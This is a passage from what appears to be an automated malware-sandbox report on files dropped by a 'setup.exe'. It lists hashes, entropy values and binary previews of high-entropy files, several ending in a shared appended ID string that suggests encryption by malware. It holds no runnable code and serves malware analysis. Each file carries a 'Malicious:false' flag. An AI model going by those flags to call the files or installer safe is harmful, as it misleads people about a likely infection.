              SHA1:7126A57172189311B5EE87D82A731F24D2977D1E
              SHA-256:BDB6CA17CB0F55659190DDF251AF396D449BD33A70EF7B891583808364FA9DDC
              SHA-512:36950A7F9B6811691A579A812518DA5DE5CE7A5C0B2B5EF5656494643D6E3EA4CD433A71AA1453EDF9D9AB5C51FD6F76FAD8192B91A6DE17D0AB9EACA44D6D50
              Malicious:false
              Preview:<?xml..........Nn.,...p....`/ ...0..0...9.QT.........e...IH.6..c.-..l....W..R.2>.c....l..1N....!i.....!.<2.k.>1.9.y....^~......r>...........Q..b...y..-.y..{.5.Xq....[...|.B.l.:.3.W...oC...`yz.....O....o....].o.?....$......p0:. .........]A..1...n.IL.>F.-C3s...i....xM....uU.}.g.C... Z.....`.dA|.#.SN{3*..(Z...wj!@C....b?...*.....]a.0Q.W.3{A.{S..tB.lW)...L.XC...8.0..d......'....`......5..)....8..('qi\.m..}zwD......4.`...f.j;N.P.[.........&..T."x...z{........Y........Z.(..F.`%/*<..+..M.e..({..f..%..+.......L...FB.".....X .+...QDy....u.!).L1..a!......_..(.Y...f..JV....'....+..plk...Ar.N...i]Cgx(......2..TI.aL.O9.j...XK:z..7.MHsw...Gv.\.....T..4=...8..V{.pr?.u.?....N....?.....Y.wf..b...[...k.`..!z>..r.iO-..n.j.n.,7..2...-...P......K..3S.B.)..b..vd.....Y.=....)..L..l.!..s.T..&.D).#..5K....4.N.A..Q..c.q....s".?...^.K.v-l..%..T.w..L.>&.u...-...S...m.N.....t.......jJ8......*R..&?...M..5..D.:.J.".T^6.....W.;y..e...#.z..d"z.....4...e..i.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1509
              Entropy (8bit):7.846610327408508
              Encrypted:false
              SSDEEP:24:1XUj/KOM99cUfzZqQF2vrLhgBs8uoLatjg2szdjX8KIi9Vx/bD:1XUjiL0UflorWBs8uoLap1sdjMKIID
              MD5:C5C207EEB729825DEA780DF1D9CFD1D8
              SHA1:157FDAD9EE390E4986E2071595371D3FCAABAC50
              SHA-256:6DCCF6505FEEEB4DB57B1A842FB8D428091771FA520C2C12B3B21BC8FC12BA44
              SHA-512:3E3341C89B3FC52A7FD2601268D613CB8B73151F64D9C235281C7F42DFE45EB4AB43CFFE6DAB220226E859168D118EA297736AD7507766945262EC569A5518F8
              Malicious:false
              Preview:<?xml............4..1..|E.Kr.+...UXF.U...Q..cag......5cmH.v.:U.......G.!....c........F....`5o-.m......$6..!..*...~.-[.&.4...T.d....;.3K.-.=....8....v...).......O&..R.e#I.....,.D>..;[5.i.%.c...Is...... ....N......|...XX.K"..N.(u.0m}...e...,...9..g.6T<A.|..{K.+^.?...f7..W.s+n"B.yQ...C%.<s_...nUR..I...L!......4.7UA.g.....6d#.%.4....2........e'.U.j.....q.......m7..t.H.Ru..+...U.9.m@Z.l.D."dl.7X....{o.*.R.._....9p.Y .M....'..u=P.)Q...&....Y.....3...._...21..{....+`..X.+D.s...k3d_J..t.....I.5.........[....Yl..../.....#>...5S..6....J.hr.|z..K.....WT@e@V.V...;.'..nB.:........#..GU.L..-(.r...._...99....N..L{.Y..XZ`E..0UL7...M.I..s....z...T..v1..e.z..CS...1?.o.5..nq.!.F..lA...g.....I"eP[.mJ.+.o!i....W..~.@.n..@...R.9.j..t:du...b....y......{.}.%....X.~o..).*O._.y5+lbS..B42..|f.@..O.....d..._..c...&]7.s.u.. .m}..J......3!3..u..6.UK.8.l..H.7.y,..#...h{.A..K]...._(...9."[.Z.|3...l..uo..&.)...../.....F8R..)@..Y.mU.yso>v.......@.......v.m
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2007
              Entropy (8bit):7.891733890077334
              Encrypted:false
              SSDEEP:48:FHuaa4ncoyzMV2TbzUJWXPw+FOji3RstJ9GRb0ipVpb1fYD:FO9OyzMWXPkjQawR7I
              MD5:1E04C761FB3A8FDC8361E0604BB44045
              SHA1:16D7CFF9352D72572535366FF40C04A86696417A
              SHA-256:118893AB13CC36926BE887D83ADD60A26AC3A487FF828B29E446B2B0E7C68027
              SHA-512:E3A7ABC06797B34570E4364987CB6646D934063F48ECCF91C394F1E169E16DB19A139DD362EEFBAB2062A3147D1D3EA7B24FB7524304803CF2B59E5925DE7C3F
              Malicious:false
              Preview:<?xml.<.7.x~..t.!=d......."......:.H.\<..1....8l....H.d...5.VV..mf.^.......v..t.x_.B....`ES*.x.{....W...!8..w..4wYH...R......8.h.Z......Rh....j.]|.0..r....q.K.. ...@e.$^.......B.|.u..M9...9.......(........tS...Y(.{.U+..)G.*Q...d..c..s..h..z.^.Rs...y-6.>..>..+....3.ai.T.f"cj......z36.Z_#......D.a......6f.L.7.P...T=..K...."fp.'.....aj....v).0!]A....X...~......D...(g@0.LSVW7.&.s.@...;l....... P.i..Y.J...Q...=........?...!.D.r....R...=7.<..H..H.H. S.[.~T.W5@..~...-...K..]..!.t6z,..g....,..gp.l=.<1E...K.......F..Wz..7....: ..y..:c.W./.....\.:.6.%....UD.....a.l.~.~...1rCN....E..se)o.....J.$...A..s.&+W..q\:.H:1!...._...($N......(./..8oKp&S(..W.s.d@.f.3G......'.M..&.).S+r..Q.....K..T....+..."..C.f.B7.....g1..w....-....+.Yn....>..t..Y....E.u.....O....?z.:........O(..q. .W..*..@.E0.)*........|%....u..tg.w.m.Ef..P...~yn.].8..qk.d.w.l...._6!......[.Ka;.A..tcZ.....5..1.....%.A..V._.G...........5p...a-....\j>....=.}..mL.N.d.X.2...=.%...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1276
              Entropy (8bit):7.8245759191327044
              Encrypted:false
              SSDEEP:24:D3TvARP6NwS0WPzYE7fRev/RwdIP26uf9taX9+JG1ptWXF0abD:PAwwvWbcadyyY9+MptWXRD
              MD5:469DFDD55DD951E4512E39EE18D40386
              SHA1:4BB879866D39A1B4B589583564644AC2A483CF36
              SHA-256:40BF15F31544B0C2DB2B5DEA2C17E4E7A324809DDC4D92910139713C5DCD643E
              SHA-512:4C7423D45850F0289C291BC12874F582833014A8EBF8B707CB4D08B59FDA3BD2085076DBA3519437BDD6EBB1AFEF19978FC76452B7EA13C30B6B5A8026A91FA1
              Malicious:false
              Preview:<?xml...[..81O.z.E.."...KHFY.....L..~t....H-,..Xa'|s..F.l0aB...0.BTu.y%.....i.....{............YH...,.Ha.>9.z.9..'...}...Ar...%....zr.W S..yz....@../...w..5...|E....|.B........../-re...Bt..J.}.rz...>....-b%...P..l=......e..?...!.+"<....{..`w.........7,.X........./(\.=......w/.....).L.....P0.S.24....r....6k'.O..?....[..6x.......!.......m.X.l..p...s.Y..Ui>(.0..Y...\..8..5.A'g..'t...M.j....\.1..l..V.Dp.4U....^.3#k~...-.|Q.]..$.x.....A.....9}."[.S|.QL......Pq0.C.{.DP.h.....(L.WP..K....n.U.6......C.OC....[..zB..A..N...J..~.#?Hg....s`.H.t.Fb.....^.9e...V.s...6I.J..]x..x....(....J..K.s..c.+..l`.C....p[-k.xP..JE#...UU.QZ.^.y...`.p.Q.+>..C....67..V.i..g:/;..F....?<S..0.`d..r4..^5.Tqt..tj...9.....*X...L.$..j..T"].R...:..Fu....P..u..1d.+..6..2n....g......bq.......KT......?...~..r..U3....)...O.=..|.......f].)$...:H..._.._..n.8..qK7.fQ)...w.$...F..&....t$...},!E_....)?#.n>.;.9.d.......:..F.I....).<....6.+X.rb..=DUT...G.A6~........e....[.H..Tf......l
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2037
              Entropy (8bit):7.912288153239081
              Encrypted:false
              SSDEEP:48:lnrrkGpV2pJJeFlUaRfXDliQLXPTtZxbRAjZP7UlJOlijpmD:lnrJLCizRfXwQLXPRZxbmZP4lJs8Q
              MD5:EF75E711AC7F4C8CE40C59600563FDB3
              SHA1:ADB700D225E854A42B571821B1C22981EF82D976
              SHA-256:E8CCAB9FEF085E701220D27B8555E9E4A6E1B4A63DED4277D10A885A1A83AFC4
              SHA-512:8159F9C51E2B2BD48083CDE4E549B5877D92300F17CE9F15509BD0D2A412A3FD499AFAEDD0BE1B3F955E501F48AC777E42A92D56BD33F8EA5A5C1C3DD7C954DB
              Malicious:false
              Preview:<?xml.9.......;.........K..mj.g..z{..+..P.......'Cs..j.QC...\.O.}.8vi..P...l...7%BN;...g-m...a@..&..4...OK.B..O..B.%..*.d.7...P...O.a<zu.O.....~....e......(.......V......~..F..PH.c......(d......$...}.c..N{.5.q..z.Y.f..<...c.q..A.v"..a....o.(bh.RG>!.Z..,5......,..n2...'@.....^..S4BD..WX......7%.)......!....S.g...(.:p.MH=4.}.C....fn1..f}m.H.......9.......6.D.G.3..r}.I..P.~.......i.......T<`.X{.('};P.(..LA3...6...0..)s.sm..d...G...m;..u.HM{z.P2.I7...0.i...G........,.#k5.;...k....)R,.y...w>....;...8+....b.~..d...F.7.gT.....J.oR.y.... ...?+......0..__.._......w@...M.._5`..z.\..Z.EA.. ..J...3..(d.XG.......$`X.<j...V.c......A.Z#.e....i.P...%n.''...p..e..*.....*$g..w\'.BT7R.. .....T...........e#].......y.......D.i..R.."gb{..`!...e;.[....@.6...r.[.T.+jXDk60w..tV}.c.._...[..`..J}.....+.A.R..1....Dl...2D...p.....]M{.).>......4......J.S...(..b...\...b..S2...C6.e..._qJ.....z... .....xY.........W.....;...K..w.u.P..Z@7.....O..h.z.IL#...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1180
              Entropy (8bit):7.792510437623132
              Encrypted:false
              SSDEEP:24:vNSEKRUAZwoApA//qPkC9co0puliW3nKSYKr4AAG60n+52WdJTWbD:jKiA6oD/YKxlKr4AAGuDED
              MD5:80BC37AE196EE2C11DCD9DA2E8B7DD17
              SHA1:8077603BBBF1130156803D6D02A6309A1828CC7A
              SHA-256:85E81344AB284051642319559C2A09A3DDC7D9D7BC588190D3A10F0D40EBD1F9
              SHA-512:6C80688A5BC66CBFE5D8AA0FC30655E46DD9344999D9844190CF80F81DCA32A572CA08DA1FBC0B4897C11478D2036DBBA5521D3397CDB6F5958CC65BD9604871
              Malicious:false
              Preview:<?xml.[r...iY...3V.Ql_.DR......6E.LJ'.\k......74.9....x*q..8.m.t[x-F.,!|b.V.;.Yz....,.0..qS=.n....1.v.J.R.~.l......'q...G.]/h....1...p......+.?.....+Pvn...u...%.F"..vd..#...x.....8.5A!....\..o..-....y.R....Xq.*....4.......@P,_...VUp......=.*...A....R.S.g.A...~....[...#...O...t.@~k..-C.M.....8+....rKP~.P.N..........z v..9gMg..0;.\..a.^#....%...5U."....R....UM.....;.%b%K\).........+..k ..3q.."Q?V..~..`.J.B@.lQ9.1...7H@..R.ph..[.6.c-...au.l.....|..@..$Ri.:.Vs.....s.wl.6G..J..<1.o& ..A..??EB.7....[.B...K.q.ES.pV/.}..$V.2..;...n.b.....lq..~3...o.Q&1..{u...R-.'>.......g1o1...v3"\.J...c.'..9EB].t+.E-l4.k.p.....l.W.@I.X..TI7..P.,.V*.(..6..p...]...#Qz.2._..dL8..7L._$...c.'..S.*..b.73..>......Du..I..=O]k..X../..c,..!...Xw..:#..G.c...k".5.Q.o......&63..3w.......&..T../..p...!.B....Vc.%.U.....c......1......7....."}....7..........[i...rX.0....9.Bb.U.u..=K..x1pe.?...v.s.....7[..Y...R.w..A.:..[..y..yoHM`.]...eP.J...u[......&G.a}..D..d..........i....O...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):899
              Entropy (8bit):7.745591904702893
              Encrypted:false
              SSDEEP:24:wBC4/tgZ3X0wCdNvMBT+pY4SbETH/hY5rxqUPMWfYbD:w9G2wy4KYvw7/hgrxqUUD
              MD5:8712D4025BF5B2BD370AC9C4CCEEDD18
              SHA1:A990DBFB12F025C367ECC0ADCB0941B36FF72FE9
              SHA-256:8AD3473818CC87C7832B6BE030E82A3D1DA9CB5EDB57C5E6B05A1AFCF1AC1C11
              SHA-512:1D87CD059360DB28E2279F93D14E76193D6D9CBD8673002EA09FFA028288B49E3433AA0821186A94CFD14E2527097527A0531AE1072FC55F6BD9BA6DEDEC59E6
              Malicious:false
              Preview:<?xmlM.?@.c-.Oi)_..$e...+.y..F..P..X..+.......*. M.A.LJl.Q.\.@$./.kZ'...I:NHm.kl.sB.U......H...ut.0.D..5*...|.y#..U.0.1.s.h.......P...F..0a.~.~....;;9..O..\.+y.p..o+ .?.r..-.)..[...[..+...N..W.R......h..C.....Rc7....."zl.OX..........ac......rWw._f...o..p.3..../.....n..v....19N......p.a{..{.&z].H..$z.y.;.qo.@..3..wY..j>..x.t..i.M...u..s..]..W..c.~$.7.a@..C.s..$b..H..-yUx..>77F.)x......i.<.YS.....>X.._j.C!{..w,.O...P+?.,d....o9.....(.Y&%j.n.3..~/;..Pl.@_.=.l...2j.n.mj,{...0...{..cW...sla.~.*%8...4../...6FR ..>..m.y.nTd..-...J-=[m....c.kjl7H.........Ow.........5.....U.x.Qk&n.x>SF.c0......'-.KLI.(..e...o.k..Q..;..+....&.f(|....I..s...aAP...Jvr...^.....}.%...m...n..`.u..Y.a....?HJ..o.l..<.....AC..Ti......7..R... U!...X'X]...a@"r.....i...T..Xu.O..<. u...9u/#O9..s.>'i../&....S.K.N..w.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2224
              Entropy (8bit):7.906285085654074
              Encrypted:false
              SSDEEP:48:AzML+kpH9V6D/lV5p7ToPM73hO4DQTi9Jz9RUXPTe9H3uD4ED:h6gs5pXeVyp9RUX7k84Q
              MD5:BDD43D2378BA85FF78153AB37BF1B322
              SHA1:BE5988C15B59182DA8CEC6B6CEACCBB121B56854
              SHA-256:735CE9D5F612B3D1CB4EE79FA41F0D0F69466C59347D1726F4EB04E050FCF7B7
              SHA-512:7C2832F4CBC0F45B9D103C6C8F48244133030431200B7F98AAF98F4BE33B5B3BB90B1BC7BB7AF2C57BB05A6A7296667D300AA2635BAE1BFD8BAE59DF272B668A
              Malicious:false
              Preview:<?xml}.....Iy..p...c.S..{..}.Ny\=F...<..[........dF.....h.2....>.?.H~.W.....C8.....v............;...z,...[,....lo..%)..x...[0......fm..n..ZO....8.].>v.B.T..../.U...]:.{...........q.p>Zg.p....[..[.G..?.t4%..a.....J\..7.....\..p~`..t..@...?.a;.G.Eo.../../2..`..........p..eM+.HR.eL6cj.x....N&..)4.h1....2.<.M...*s'^......Bz.......>..xqZ.Hn...eX*v.X....G.`...B./...)..M.J.~..M.....I...._./..1......G.V/'..(.|D..s.`.4..q..M=.=No:t...d{H..T.$8.....GfO,.I.{)..4..D.[......8.N..D..X's.S..M.Y.9Y. ..T.+....*.3..r#......Rp....%..d..S......X....-..J8..^........A...b.......[............/..A{3._.0...x3..........E-...BGP.!....Amt.....a%.q.F..ZU..A..~.D......4..I..}&..Idn...b.v..i7.}g.......$...f....P.w..oOZ#.`....).........+....D...6.i...U.g.......%G.BN....yq.#)*_. .o...h]#/..q7.T......I.U...|k.B.Q.w...;/...p......E.5}..0......K.z.?.l...D0...L...x.z'.......-V.D.F..B.f.W...kF..kR.Gx[.'.t*h...To`.....tP..A_7.{..l...3..tVs.R.....-cG.-#j8.f.].|...8
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1560
              Entropy (8bit):7.873926485845986
              Encrypted:false
              SSDEEP:24:JCUL1BCAxjO70bfSMMkvitKWcWXSxP5/HJMQA/rX5gWxhehcR/cvFtbD:dz/jO7qSM3qVixP5mQAFgWxheeROD
              MD5:871F9F01DFFABA653765ED517A9EEA96
              SHA1:D9984F043814047AD90FD727AAD872B307B0001D
              SHA-256:6F9CAC977A8FF67D34EC99877A76595CEA9B31C197B5D944663AE5B7958DFEBD
              SHA-512:072DEC5183B038E4E700DDC3C9B7666B40DC2DE129D0FFA7B6CCE385461797F644B0A54C13ECAA3DC5AE091BE2DF29CA2DC0F0D380D816C5225388EC3CD518F3
              Malicious:false
              Preview:<?xml.....W.i..9K..X$..<.th.aW...U...../.j.=Y.t..}_-.B..y%...6..+.A.,.>..e....|....{W.P.Sp..p.&..&u4.[\....y).4..r......$[..HR\).C....9.I.t....66..........d..jO.Z.-.~..}....?./.L......_..E..LL.....wn.ei...@U.<.|................F...[.1.B...4...1&..F......<.":.e..x...r..U....T..."+{......-k...u....O0oT$.D+g.A.=....... .#."FY.W...........8.....YR!.w...xB.....Ml...j....#...6Z....+>3.c.!)..# ..J_.B....hy0..W......+K}...(...x...+...h...D.J...6E..d...a1.....U=...G..:V.)..~../m{*.K3...R........l.GL.....T3.N)...C.-.......;<E. L?.Bbu..40......O...=h../........m|.UGt.j^.y...."!.q. _.\...........G....y.*..O.y..u.m5....A.e(.fx....:ig.0t>.K.uA.M.[....B<....M.$``.!%.0045..e.}...b..zP(*g.6..d..}.F..7.J......$....=QW.i,zS.@}.C......C..8y3.P...........(r\O..g?..L..k.g%.%.Q....|..}..c}.o....b.C7f.;..f.7...j..v.2X%...?.(z)N|9.thBVG~?." ......Ak..f.t..kw...o>sJ...?.M....n.k{7.}....'&.....-..00\.!..#:..va%....=.tq.u..#.!.{X...].kX.....J.~\.....6p}@....?..c..PV
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1206
              Entropy (8bit):7.827991349304129
              Encrypted:false
              SSDEEP:24:RqLvege/QxJS2cnCu8dirad04vDysWpIU/ErajgsmbD:QjeeY2c+qwunzj2D
              MD5:62C4398389E0F7202F3D534120A991A3
              SHA1:040287867E1A6BDAAFC12B645E02E87314E80417
              SHA-256:9EF9281EF20C0112BEE0AE8D8FB3F2CCC34A3ECF01F416E9284A10914FB2D807
              SHA-512:48C9746AC8960C7B78E7092DA08A212484B191A8309DC2B00C29E8A48C7BFBAE2AE0B5E04F18633CE75A2C7BDAF4440D2C9EFFE05FFF2E5E7E72D3197565D409
              Malicious:false
              Preview:<?xml...S."..7}o..n....z]..W.....R./.+..G...v*.r..XC>........I.E.%Z...&i...c..'.;.....Nl..0.W.L...7.......[.3.k.S.....?M.ja.;@@ ..hy.'.....g...Io>3..bO..8.E..V..qJ...@....+..:..+H.i..l"..|t.[......bU.SYSe-M..Zn(fG..&).7.:.&FFL....M"....6.....kN.7)...&.V.E...:P..-.91O..I....9WR....7a.'..:....Q.....y.k.......j.`9.z....hb...F6...">.v7Z..p..nb..0*.A..../..?...&J.Q.......G......u....[ `........b..!5...Ke.p...<........L..T..!j.r:_.l..rN.........);..6.....|..1:..[.;B.c.LO9.}.......\...e].........o........yV<.....:....h..V.q-{..pG.. ...+F.>iS..&-...3.....x...'....2.s.?i..z._..U....T., N........QyO.8.)o....w.z.*|s....J.].....g?V.G.4?...mv.O.K....D..g.TM.+.k...)d...:y.|..>.X.t.;.f.|./.....'....}YG 9.y ..1.d.M..r.C...e......u.a`{T..>.....k.....v.:....~D...^.....tC...9.GX.=g.q..N.!.C.{...L.Z.V....c.4.@.........R&.....r.I...u.c}%.....%.M..<z.k.."..n...z..O.d<.+A..?.t..y"...A.mSv.D...`.Pc/b..j)u=.'...0<,.S..,.E..b.._/..%....z.*^..G..E.1....P....4&6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):738
              Entropy (8bit):7.689629622995024
              Encrypted:false
              SSDEEP:12:MaQ64dqfbdZDg7kVxO804WwQDHsp9o4tUWCcUGDLCYq7CWyhw7hM70m0SCAHWHhV:bQ6FrDgA3N04WwQDH9L32CbuWTls0I2/
              MD5:3CAA6B12B3C07E0F5C79838FDB25EFA4
              SHA1:E08FAE8226FFBD4FE19114CFCAA1EFFFE72916DD
              SHA-256:FA87AB5B027DA74442F19E9C59AD7A547FC059FF1AF8D49F287E87A632F0E399
              SHA-512:C9C309C2E8E82E7A1DF55CEF42F3DBF09CEB0AD530C3EE86A613918D03F7F62B69901C624E7B6556BEACD699A96702A443960B705286824F32BD5442BCE8D83F
              Malicious:false
              Preview:<?xml4..?C.gN/.=...X...(_..|...kPJ...T..`uzM.l@g.O..].o......}.....7E.!.h..9..TA..A0.nj.m.MUf./V......H0....=y.F..g..NsN...mR>1.D.Ayx...........&+Q.F.......M..M.e.....t.~.|........A...F.W..1.u..{".t.A.y..!..}X6^r.v..?.r .SA.[TX...j..o.@.Xx....jF....o:...c.&3di.V...k.....s...u..g..J;g.<&.3m._.$.j.C......|{n.#.].9..C1OhcN..K......8]...%..\....-hL.aH.d...+~.8+Y2G0bw.$.h...Q.n.P.....-...u.C&....X.%.H.[..../..x.v..XK1.......`]c...^..L.P.X........NhE..&j..o<0..pE.i.-..+..K.y....v>mW..j.;M...>.q..i./y..&..?.~..d... >Su...Nc....o......:....f,j....F.^G..N9..s.....v.:.+.7.c..j...G..D....5.3O...@g.O..b3.or/.c'..z.t...B.Q.....^.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1044
              Entropy (8bit):7.83705004889405
              Encrypted:false
              SSDEEP:24:iJ8rHfPh8SkIFrlzgmkB2gUtl6Bhjx4kQ01JbD:owXhtkB2eG01pD
              MD5:DD3BA0558AFBCD840260D8FDE7403773
              SHA1:F71F9181EC58BDE7DC709789596214D8E4FBD07E
              SHA-256:23E9E40901CE490426865AA9578D0B39230F1B68DE425CBDF83005725ADB74F5
              SHA-512:34FE20949A0A57BCFE2E004E20DF05EAE8A0FC9F525B9FCF6E9BC7E17CE03BD79C3E79E11ABAF4A4A563484D6F5148B0B233430D84BA1BAD88C8ED4F2BD0CF2F
              Malicious:false
              Preview:<?xml..;..k..h..U......>.j....C...7.r....."v.sd....$....[[`5km.jR...V.....P.....i.&.........Oq..g...p....4....#...S...&.....vr'E.....3K..='a.O.0.7)..sW...I.K9....S.!VP...m.>..T.jM:....w...j.SnPX,J.=....^...f.....jRe.#....N...)......1,.].6'..I>.eA....0I..Sh...#.l.M.h.. ........@86M....l..p..G..\V.Z.}......&hj..NE.......Ln.c....M#.YY..M.0q...../G..v^..N@..P^......:.hn..R....A...$.....0...;...$.jC.x.=.Y..[..U._..\.......x......i.p...jj./T.!......^+?da...D.p.F...#Gw."...s&.W..._.rCD&<.JY.h.;....nr4..........5....>.H..D...P"+....I.M..q.".w.kT.<.$..Z^......L.+...f....T.&s..D_0...6.0....k....9..;..!..<...eo.#B.....J..|}"..f..s).(....2y....X...m..`.c..I..y....s.V.g..e~....W..H.z.(Of..f.d%kZ...%..b.O..ea..i&....[.0M...;.z..wp[..U.k.....|.[R~Z.1.........8.....h.X./.*..P....SM..S.;.=...`(g..8.G..v..U}...H..o./.'._......%..Y1...... ...q.Z.*.J...;.G......l.8$..._/...E>.S($N./x.....(...1..<.n.,.@IK.&..%bCoq.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvP
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):862
              Entropy (8bit):7.685304267513695
              Encrypted:false
              SSDEEP:12:M61G57JjJv01J+TRWgNoVrJ9XcPZAYwuFyGCIqa2JRY6XHP4bAsMR2cii9a:aXvCgTwgCJ9yw8yjaMRhXv4b5bD
              MD5:4E2994F9D04EEDF4C4AD25CDB0518015
              SHA1:F8DCEA8A9AD4C58FB5F28AF2DD5E7EFDE70E7F98
              SHA-256:DB165BE5177F5EB390DF0DC296788C77967557B2C41EA12AED6F99904AE39AE9
              SHA-512:FA5958AB244FE6F1C317902E6A32CBBFB413FDAC5C0ACBA6F6D9850FA3A69EDDB3FD9BEBCEC301CDCD7F2B3D524A4D0C3D15789A3685B628664AB8B02E4B088C
              Malicious:false
              Preview:<?xml...7P....{.....:.......e2...+.c3.....,V2..ZY..).......^-F.xz..*....n. ..^....7.b=..R}a:...<....`.2..Ks.z.....&k.|..p7/T0 O6.......H7.Q.T.w@&..m.Q.....T.:.)'q1....=w/..4.o0..RN2..w?[.. . ..h.'q.z.o.........gU....^$~..*.C.st...DD.oc..6z....R...3)Z...i..o..8twm...T..|.._.X..^:y0/..mBX6T.o........".%....L.v....)(&...p.mP......t..7..i..HB-...7...j".m1.W\.6.mG.Xm..\..X.`.....b..6..\..~.8...Z.8...O.h.5.'.Y>..|...OgU.-...b..........?.T.`.?..E.,.$..kR....5./.h..........K.AT0.. V..g....Ag...E.X.{...'F4H}.q.....V.!4.......'J..p.%r..2.~...6...0.8..]T..n.N..m..^......L..Z..V..._....}.S.,N)A..L3.OCA..%.Oo$.*..j.O.;..F..ubr|Q..`.BdcF.Wdi....^.TI..mo.B.k..\.9...u...2z..R.....(....m..$*...^.h1.......W.9......@.0C.z..]([...r.......W....$}...X.%.}VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1376
              Entropy (8bit):7.851034130951215
              Encrypted:false
              SSDEEP:24:4ouSaY90xDa3vPPAMH/P0PMsnzxdfDeWZ6+CmXdDHrGR+tQcTXQ81jbD:4of0xDa3HPpJsnzxJeWZlCmXdDqR+pDp
              MD5:2C50E30C36A4440AA17B2C320DC5E7C4
              SHA1:C5F54BCDF8B67F0BA8739D13E94409A5880FE969
              SHA-256:CBEF19EC11BE2072A81E1FF8C2001C5C962F21A55603D76A029C8532E756BAA8
              SHA-512:9B14A7031B167D74C8AC621F5F1DBCFDF815D3EA9D838D8CE41E477FF0EE3695357C3C7325F5CF33B297D26AADC4C2BF2401D6B1063147259FBC80D61A6AA008
              Malicious:false
              Preview:<?xml|75......*y.u9^.q.}YL6..?..N-..@C-~r.....ci..-._.UI+..$....B.\.i.ev.c..S..|.{J%w..Z...:..dL....).ZW...tY.A[.4..l.1.....e.=c..22b._..,...*.......c.......P...t.....*..::..S.5O..S.8.........<\.O.B1...G.......R&...#..fo... |..BS..)..:K5....r.l.Z............@`(.g........v.].$&..1n...~.Y)...L........&.N....'.....R|.p..\A&..hN.|.).?.r8./..o...U/...y;..+......4...f7u..s.8z.... .$. i...C.c;.......]p.)*.VC.\....s<.3.q.....v!...w..y).#.H....eh.....`BxM.A...v.tR..dS......A.8.[=..6.D...Ko;..h....os.J.y...n...!.i|=3..7.&......j.-...."&..8BD?..`.E7..@|:..G....|=.OH.....}.e%.K.$..,.a...*>.,@...C.VU;...S.T./w..I.6...l...p@..tF)1q.{.Y.........I...T.rP.2...V.@.......Q.T/J...w-.N.L4....n....o...b.+..A.@.I....9..<.;aS*p.n..".. ..)............a\........6..G..=...N*...Tt.W.........qe.@........s.-}P.."s.....c..R..Fvx..jFF.`._....... ......v.N.......B.!...Do...-..C...P.{..Oj..Pg..YK9U.Vhc\...A..qEi.>.an.2_.A..w.......C,......N..y...H..=..e.^......x.T.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2037
              Entropy (8bit):7.904362126921739
              Encrypted:false
              SSDEEP:48:geWnYxms0X30wSw27CdpEWymVZ4/MR/ldZtoizUK/uD:m9HXkh17CdymVZ4uT4izu
              MD5:507C0DEB405BA34546148BDFF69277EB
              SHA1:B42B5269538815407CD542C0005412D0B59B722C
              SHA-256:5C2A06DC80B4F98E9D742CB20210D080E547D42B0C9C5A2DF2C9C16F4318B2E8
              SHA-512:7766645F8DF555F4D95A543855ABE3AEDD9EB9CE5C55F12C925673825A3C11BDD960FE6E7E5097AEBD782120D348BE570E2249E07A7651DAE3CB97E133E09484
              Malicious:false
              Preview:<?xml].a6w....Yn;...GY[.j._~.*q.Yf....+@.'..(+u.7..D~y_a..X\.f#+.A...`.O...8...g.-....(.......Q."..^..'.Mm..x.O`N@.....H.."...=.S.....}X.j.,.=...D|.$.....K..Y.k..j...,..o.>].l.y!..uu.hHk9.f..e......C?.drV.<2B..y......A*.'......8..y9-.C[..M.-.>..O..3.h}W..d..}.....7./nT..|!/z..p#.YN.&2.- .4.......D..ZT..........!C.'.+..M..r.g.E(o..Y.......>.:~]..g.`."%f.v.W...E..d6W..6..o).........y-....'9.../.T.3eSU.t..w.|{x...."i....j..Z.k.....N...p.S.90...*......2..tI.}.$...P0....T..F1...2.......;._P.l.>.]).k.3.5.Z.(.IX.2Og....$.'oqq..c....9.DD+.D.3`.....b...B.O.?...6.bg_...^.k.R.MH.2wV....J.".&.a..S...$..+....a.H7...vm...sXX..>.U.r....2.wN=...(......J..z.k.Qf.RB.Y......V...eE..%g....i.`i.~.F.%.Y....R...@..l...}..5.6~&:.G.M..^.Dl$.b..z3..]`8H>Z.i.j........(N?.CT63...{[...7^.....V.,:..u.=.P.-.b....JM.z\g.o.l..r.......M...ukx#.z...KQZ...W.Na...O..[+.11...z.yA.)....w.e.{V.>...*..Y..s..[...v.w.L.I....qbH/.cg<-.X...i...[@.]w....Wx.....v_..%..n&....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2074
              Entropy (8bit):7.910638284978509
              Encrypted:false
              SSDEEP:48:36aJ1h/OX3r4HW6ZXu9/OwKlUV96WhI6htOipYyitFkD:qaJK0HW6Zg/OCEa+Fw
              MD5:FB234FEA8350FA2E6879265AE5288874
              SHA1:C6670AB01A819C5FE24D3C8229D4F30CD6879B46
              SHA-256:76B7AF0238FEBAF595277E250C2C74E33932868214B4FDABF3404B43CA269357
